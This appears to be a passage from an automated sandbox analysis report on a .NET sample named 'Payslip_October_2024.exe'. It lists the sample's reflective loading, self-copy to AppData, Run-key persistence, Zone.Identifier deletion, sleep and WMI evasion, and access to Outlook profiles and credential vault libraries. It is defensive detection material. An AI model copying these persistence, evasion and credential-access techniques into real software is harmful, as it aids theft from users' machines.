                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Section loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: Payslip_October_2024.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Payslip_October_2024.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, f0FZ3tm1t5LeGCMWQS.cs .Net Code: Nl7f1pCxTT System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, f0FZ3tm1t5LeGCMWQS.cs .Net Code: Nl7f1pCxTT System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payslip_October_2024.exe.76f0000.5.raw.unpack, XlF5VlCIHRSQX8M5eh.cs .Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, f0FZ3tm1t5LeGCMWQS.cs .Net Code: Nl7f1pCxTT System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payslip_October_2024.exe.3ea88f8.3.raw.unpack, XlF5VlCIHRSQX8M5eh.cs .Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payslip_October_2024.exe.3e888d8.4.raw.unpack, XlF5VlCIHRSQX8M5eh.cs .Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe Code function: 2_2_00C70C55 push edi; retf 2_2_00C70C7A
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe Code function: 2_2_04FB2347 push ebp; ret 2_2_04FB2348
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe Code function: 2_2_0562ECB0 push es; ret 2_2_0562ECC0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Code function: 5_2_0298F7C8 pushad ; retf 5_2_0298F7D1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Code function: 8_2_00FEF7C8 pushad ; retf 8_2_00FEF7D1
                    Source: Payslip_October_2024.exe Static PE information: section name: .text entropy: 7.734734914632359
                    Source: sgxIb.exe.2.dr Static PE information: section name: .text entropy: 7.734734914632359
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe File created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIb

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe - File opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe - Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe - Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe - Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe - Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe - Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe - Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: Yara match, File source: Process Memory Space: Payslip_October_2024.exe PID: 7532, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: sgxIb.exe PID: 7952, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595265
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595156
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595046
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594936
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594828
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594718
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594609
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe Window / User API: threadDelayed 3380
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe Window / User API: threadDelayed 6455
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Window / User API: threadDelayed 4178
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Window / User API: threadDelayed 5278
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Window / User API: threadDelayed 7582
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Window / User API: threadDelayed 2283
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7552 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808 Thread sleep time: -34126476536362649s >= -30000s
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe TID: 7808 Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7968 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176 Thread sleep count: 36 > 30
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176 Thread sleep time: -33204139332677172s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176 Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6228 Thread sleep count: 4178 > 30
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176 Thread sleep time: -599875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8176 Thread sleep time: -599766s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 6228 Thread sleep count: 5278 > 30
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5812 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344 Thread sleep time: -25825441703193356s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7344 Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
